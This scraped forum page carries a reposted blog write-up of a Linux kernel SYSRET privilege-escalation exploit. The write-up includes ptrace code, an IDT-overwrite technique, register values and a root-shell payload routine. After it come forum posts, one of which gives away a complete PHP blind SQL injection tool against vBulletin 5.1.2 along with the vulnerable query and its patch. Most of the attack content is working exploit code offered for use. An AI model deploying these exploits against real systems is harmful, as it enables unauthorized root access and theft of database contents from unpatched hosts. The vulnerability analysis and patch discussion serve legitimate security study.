and this is exactly what it does on both Intel and AMD platforms. However, the difference between these two platforms comes into play when a general protection fault (#GP) is triggered. This fault is triggered if a non-canonical memory address ends up in %rcx upon executing the SYSRET instruction (since SYSRET loads %rip from %rcx). What is a non-canonical address? There are a few good explanations on the web (e.g., this link).

On AMD architectures, the %rip is not assigned until after the privilege level has been changed back to guest mode (and #GP in user-space is not very interesting). However, on Intel architectures, the #GP fault is thrown in privileged mode (ring0). This also means that the current %rsp value is used in handling the #GP! Since SYSRET does not restore the %rsp, the kernel has to perform this operation prior to executing SYSRET. By the time the #GP happens, the kernel would have already restored the %rsp value from the user-space %rsp. In summary, this means that if we can trigger #GP in SYSRET:

- #GP will execute in privileged mode
- #GP will use the stack pointer supplied by us from user-space

That's great but how do we trigger the #GP fault in the first place? The %rip address loaded from %rcx would always be canonical. That's where ptrace comes into play. If you are not familiar with ptrace, this is a good place to start. In short, that's how debuggers stop a running process and let you change register values on-the-fly. Using ptrace we can change %rip and %rsp to arbitrary values. Most ptrace paths go via the interface that catches the process using the signal handler, which always returns with IRET. However, there are a few paths that can get caught with ptrace_event() instead of the signal path. Refer to the PoC code for an example of using fork() with ptrace to force such a path.

Exploitation

For the exploitation phase, I was using Ubuntu 12.04.0 LTS (3.2.0-23-generic) simply because that's what I had at the moment as my VM. I think it was mentioned that this issue would affect 2.6.x as well as 3.x branches.

To trigger the #GP fault in SYSRET we obviously need to set our %rip to a non-canonical address. In the PoC I'm using 0x8fffffffffffffff but any non-canonical address would work. The next step is to set the %rsp value. If we set it to a user-space address, we'll simply double fault. However, if we set it to a writable address in kernel-space, we can overwrite data on the stack.
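The register-tampering half of this is easy to show in isolation. The hedged C sketch below uses PTRACE_SETREGS to load a stopped child's %rip with the non-canonical value; on its own (and via the normal signal-stop path, which returns with IRET) it merely kills the child, since the full PoC also needs the fork()/ptrace_event() stop so that the return to user-space goes through SYSRET.

/* Minimal sketch of the register-tampering primitive: a tracer rewrites a
 * stopped child's %rip to a non-canonical address via PTRACE_SETREGS.
 * This is illustrative only; it does not reproduce the vulnerable path. */
#include <stdio.h>
#include <signal.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/user.h>
#include <sys/wait.h>

int main(void)
{
    pid_t child = fork();

    if (child == 0) {                             /* tracee */
        ptrace(PTRACE_TRACEME, 0, NULL, NULL);
        raise(SIGSTOP);                           /* let the parent edit our registers */
        pause();                                  /* never reached once %rip is poisoned */
        _exit(0);
    }

    int status;
    waitpid(child, &status, 0);                   /* child is now signal-stopped */

    struct user_regs_struct regs;
    ptrace(PTRACE_GETREGS, child, NULL, &regs);

    regs.rip = 0x8fffffffffffffffULL;             /* non-canonical: bits 63..48 != bit 47 */
    /* regs.rsp is what the real PoC points at the chosen kernel address */
    ptrace(PTRACE_SETREGS, child, NULL, &regs);

    ptrace(PTRACE_CONT, child, NULL, NULL);       /* resume with the poisoned registers */
    waitpid(child, &status, 0);
    if (WIFSTOPPED(status))
        printf("tracee stopped by signal %d after faulting at the bogus %%rip\n",
               WSTOPSIG(status));

    kill(child, SIGKILL);                         /* clean up the doomed child */
    waitpid(child, &status, 0);
    return 0;
}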
Let's take a look at the general_protection handler that we enter with an arbitrary %rsp pointer:

0xffffffff8165cba0 <general_protection>       data32 xchg %ax,%ax
0xffffffff8165cba3 <general_protection+3>     data32 xchg %ax,%ax
0xffffffff8165cba6 <general_protection+6>     sub    $0x78,%rsp
0xffffffff8165cbaa <general_protection+10>    callq  0xffffffff8165cd90 <error_entry>            [1]
0xffffffff8165cbaf <general_protection+15>    mov    %rsp,%rdi
0xffffffff8165cbb2 <general_protection+18>    mov    0x78(%rsp),%rsi
0xffffffff8165cbb7 <general_protection+23>    movq   $0xffffffffffffffff,0x78(%rsp)
0xffffffff8165cbc0 <general_protection+32>    callq  0xffffffff8165d040 <do_general_protection>  [2]
0xffffffff8165cbc5 <general_protection+37>    jmpq   0xffffffff8165ce30 <error_exit>
0xffffffff8165cbca                            nopw   0x0(%rax,%rax,1)
...

When entering the error_entry at [1], we overwrite a few entries on the stack (0x78(%rsp) to 0x8(%rsp)):

0xffffffff8165cd90 <error_entry>      cld
0xffffffff8165cd91 <error_entry+1>    mov %rdi,0x78(%rsp)
0xffffffff8165cd96 <error_entry+6>    mov %rsi,0x70(%rsp)
0xffffffff8165cd9b <error_entry+11>   mov %rdx,0x68(%rsp)
0xffffffff8165cda0 <error_entry+16>   mov %rcx,0x60(%rsp)
0xffffffff8165cda5 <error_entry+21>   mov %rax,0x58(%rsp)
0xffffffff8165cdaa <error_entry+26>   mov %r8,0x50(%rsp)
0xffffffff8165cdaf <error_entry+31>   mov %r9,0x48(%rsp)
0xffffffff8165cdb4 <error_entry+36>   mov %r10,0x40(%rsp)
0xffffffff8165cdb9 <error_entry+41>   mov %r11,0x38(%rsp)
0xffffffff8165cdbe <error_entry+46>   mov %rbx,0x30(%rsp)
0xffffffff8165cdc3 <error_entry+51>   mov %rbp,0x28(%rsp)
0xffffffff8165cdc8 <error_entry+56>   mov %r12,0x20(%rsp)
0xffffffff8165cdcd <error_entry+61>   mov %r13,0x18(%rsp)
0xffffffff8165cdd2 <error_entry+66>   mov %r14,0x10(%rsp)
0xffffffff8165cdd7 <error_entry+71>   mov %r15,0x8(%rsp)
...

However, we can control all these registers (well, except for %rcx) via PTRACE_SETREGS (see the PoC for details):

// get current registers
ptrace(PTRACE_GETREGS, chld, NULL, &regs);
// modify regs
...
// set regs
ptrace(PTRACE_SETREGS, chld, NULL, &regs);

The general_protection handler then invokes the do_general_protection function at [2]:

Dump of assembler code for function do_general_protection:
0xffffffff8165d040 <+0>:    push   %rbp
0xffffffff8165d041 <+1>:    mov    %rsp,%rbp
0xffffffff8165d044 <+4>:    sub    $0x20,%rsp
0xffffffff8165d048 <+8>:    mov    %rbx,-0x18(%rbp)
0xffffffff8165d04c <+12>:   mov    %r12,-0x10(%rbp)
0xffffffff8165d050 <+16>:   mov    %r13,-0x8(%rbp)
0xffffffff8165d054 <+20>:   callq  0xffffffff816647c0 <mcount>
0xffffffff8165d059 <+25>:   testb  $0x2,0x91(%rdi)
0xffffffff8165d060 <+32>:   mov    %rdi,%r12
0xffffffff8165d063 <+35>:   mov    %rsi,%r13
0xffffffff8165d066 <+38>:   je     0xffffffff8165d06f <do_general_protection+47>
0xffffffff8165d068 <+40>:   callq  *0xffffffff81c177d8
0xffffffff8165d06f <+47>:   mov    %gs:0xc500,%rbx      [3]
0xffffffff8165d078 <+56>:   testb  $0x3,0x88(%r12)
0xffffffff8165d081 <+65>:   je     0xffffffff8165d140 <do_general_protection+256>
...

At [3], the kernel will page fault when accessing %gs:0xc500, then double fault and crash. The question now is what can we do to prevent the kernel from crashing and possibly transfer execution flow to our mapped memory region in user-space? Well, let's just overwrite the #PF (Page Fault) handler in the IDT (Interrupt Descriptor Table) with a memory address that we control.
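For reference, each long-mode IDT entry is a 16-byte gate descriptor whose handler offset is split across three fields (Intel SDM Vol. 3A). The sketch below shows the layout; zeroing the high dword of the #PF entry's offset leaves only the low 32 bits of the original kernel address, which is what makes the redirected handler land at a user-mappable address.

/* Layout of one 16-byte IDT entry in long mode (Intel SDM Vol. 3A),
 * shown only to illustrate why zeroing bits 32..63 of the #PF handler's
 * offset pulls the handler down into a user-space address. */
#include <stdint.h>

struct idt_gate64 {
    uint16_t offset_low;     /* handler offset bits 0..15 */
    uint16_t selector;       /* kernel code segment selector */
    uint8_t  ist;            /* interrupt stack table index (bits 0..2) */
    uint8_t  type_attr;      /* gate type, DPL, present bit */
    uint16_t offset_mid;     /* handler offset bits 16..31 */
    uint32_t offset_high;    /* handler offset bits 32..63 */
    uint32_t reserved;       /* always zero */
};

/* Reassemble the full handler address from a gate entry. */
static inline uint64_t gate_offset(const struct idt_gate64 *g)
{
    return (uint64_t)g->offset_low |
           ((uint64_t)g->offset_mid  << 16) |
           ((uint64_t)g->offset_high << 32);
}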
In the PoC code, I've mapped the following memory region in user-space:

trampoline = mmap(0x80000000, 0x10000000, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_FIXED|MAP_POPULATE|MAP_GROWSDOWN, 0,0);

We then set our %rsp value to regs.rsp = idt.addr + 14*16 + 8 + 0xb0 - 0x78, i.e., the IDT start address + address of the #PF handler (14th entry where each entry is 16 bytes) + 8 bytes (we need to overwrite offset 32..63 in the #PF entry with 0) + some padding. The Intel developer's manual (Vol 3A) provides a good explanation of the IDT structure. In the PoC code, the %rdi value (which is set to 0, regs.rdi = 0x0000000000000000) will overwrite the offset 32..63 in the #PF entry, leaving us with a memory address that points to user-space. On my test VM, this address is 0x8165cbd0, which is why we've mapped our user-space memory region at 0x80000000-0x90000000.

I should point out that it's important to MAP_POPULATE when mapping this memory region so we don't trigger #PF on accessing our mapped user-space address, i.e., the #PF will trigger a double fault in this case. Here's the excerpt from the mmap(2) man page:

MAP_POPULATE (since Linux 2.5.46)
    Populate (prefault) page tables for a mapping. For a file mapping, this causes read-ahead on the file. Later accesses to the mapping will not be blocked by page faults. MAP_POPULATE is supported for private mappings only since Linux 2.6.23.

Once the #PF is triggered, we'll land in our NOP sled. However, by that time, the IDT will be trashed. We've overwritten a few entries in the IDT including a number of critical handlers. In the PoC, there is an attempt to restore the IDT by setting the register values (%rdi, %rsi, %rdx, etc.) to the original values:

regs.rdi = 0x0000000000000000;
regs.rsi = 0x81658e000010cbd0;
regs.rdx = 0x00000000ffffffff;
regs.rcx = 0x81658e000010cba0;
regs.rax = 0x00000000ffffffff;
regs.r8 = 0x81658e010010cb00;
regs.r9 = 0x00000000ffffffff;
regs.r10 = 0x81668e0000106b10;
regs.r11 = 0x00000000ffffffff;
regs.rbx = 0x81668e0000106ac0;
regs.rbp = 0x00000000ffffffff;
regs.r12 = 0x81668e0000106ac0;
regs.r13 = 0x00000000ffffffff;
regs.r14 = 0x81668e0200106a90;
regs.r15 = 0x00000000ffffffff;

This code is obviously very kernel-specific. In the payload, we can then do the usual privilege escalation routine (commit_creds(prepare_kernel_cred(NULL))), followed by some syscall execution (e.g., setuid(0); cp /bin/sh .; chown root:root ./sh; chmod u+s ./sh). Or we could attempt to set the appropriate registers and IRET to user-space with a stack pointer of our choice.

Conclusion

There are a few things to note here. The PoC is very kernel-specific. Trashing the IDT is not a good approach (i.e., it affects kernel stability). Since 3.10.x the IDT is read-only, so this approach would no longer work. What other kernel structs can we overwrite that would give us a more reliable (and possibly universal) way of exploitation? I would really appreciate any ideas here.

Vitaly Nikolenko
Copyright © Hashcrack 2014

Sursa: Hashcrack - Vitaly Nikolenko
-
Note: danyweb managed to discover it before the guys at 1337day did. And he didn't make it public, he didn't try to sell it... Edit: I've added details.
-
Nope, let them make fools of themselves. As you can see, the exploit is TRIVIAL. And it's not even that useful, there are too few forums running vBulletin 5. I'll post more details when I get to Bucharest.
-
Some idiots are trying to sell it: http://1337day.com/exploits/22452 For 2000 $. Gay Here it is. Free. [phpcode]<?php /* Author: Nytro Powered by: Romanian Security Team Price: Free. Educational. */ error_reporting(E_ALL); ini_set('display_errors', 1); // Get arguments $target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5'; $expression = str_replace('/', '\\/', $target_url); // Function to send a POST request function httpPost($url,$params) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $params); curl_setopt($ch, CURLOPT_HTTPHEADER, array( 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Accept: application/json, text/javascript, */*; q=0.01', 'X-Requested-With: XMLHttpRequest', 'Referer: https://rstforums.com/v5/memberlist', 'Accept-Language: en-US,en;q=0.5', 'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;' )); $output = curl_exec($ch); if($output == FALSE) print htmlspecialchars(curl_error($ch)); curl_close($ch); return $output; } // Function to get string between two other strings function get_string_between($string, $start, $end) { $string = " ".$string; $ini = strpos($string,$start); if ($ini == 0) return ""; $ini += strlen($start); $len = strpos($string,$end,$ini) - $ini; return substr($string,$ini,$len); } // Get version print "\r\nRomanian Security Team - vBulltin 5.1.2 SQL Injection\r\n\r\n"; print "Version: "; $result = httpPost($target_url . '/ajax/render/memberlist_items', 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1,1)--+"+' . '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); $letter = 1; while(strpos($result, 'No Users Matched Your Query') == false) { $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result); $username = get_string_between($exploded[1], '">', '<\/a>'); print $username[0]; $letter++; $result = httpPost($target_url . '/ajax/render/memberlist_items', 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),' . $letter . ',1)--+"+' . '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); } // Get user print "\r\nUser: "; $result = httpPost($target_url . '/ajax/render/memberlist_items', 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1,1)--+"+' . '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); $letter = 1; while(strpos($result, 'No Users Matched Your Query') == false) { $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result); $username = get_string_between($exploded[1], '">', '<\/a>'); print $username[0]; $letter++; $result = httpPost($target_url . '/ajax/render/memberlist_items', 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' . '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); } // Get database print "\r\nDatabse: "; $result = httpPost($target_url . '/ajax/render/memberlist_items', 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),1,1)--+"+' . 
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); $letter = 1; while(strpos($result, 'No Users Matched Your Query') == false) { $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result); $username = get_string_between($exploded[1], '">', '<\/a>'); print $username[0]; $letter++; $result = httpPost($target_url . '/ajax/render/memberlist_items', 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),' . $letter . ',1)--+"+' . '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); } print "\r\n" ?>[/phpcode] More details: The query was the following: SELECT user.userid, user.username, user.usergroupid AS usergroupid, user.lastactivity, user.options, user.posts, user.joindate, user.usertitle,user.reputation, session.lastactivity AS lastvisit, IF(displaygroupid=0, user.usergroupid, displaygroupid) AS displaygroupid, infractiongroupid, user.usergroupid FROM user AS user LEFT JOIN session AS session ON session.userid = user.userid WHERE user.username LIKE "[B][COLOR=#ff0000]D[/COLOR][/B]%" GROUP BY user.userid ORDER BY user.username ASC LIMIT 0, 10; The "D" is the controlled parameter. And, the quote (") was NOT escaped. The query was generated with a function from querydefs.php: public function fetchMemberList($params, $db, $check_only = false)The vulnerable code: if (!empty($params['startswith'])) { if ($params['startswith'] == '#') { $where[] = 'user.username REGEXP "^[^a-z].?"'; } else { $where[] = 'user.username LIKE "' . $params['startswith'] . '%"'; } } And the patch contains the fix: if (!empty($params['startswith'])) { if ($params['startswith'] == '#') { $where[] = 'user.username REGEXP "^[^a-z].?"'; } else { $where[] = 'user.username LIKE "' . $db->escape_string_like($params['startswith']) . '%"'; } } So now, the value is escaped and SQL Injection is fixed. vBulletin team moved really fast in fixing this problem. More info: https://rstforums.com/forum/86951-rst-vbulletin-5-1-2-sql-injection.rst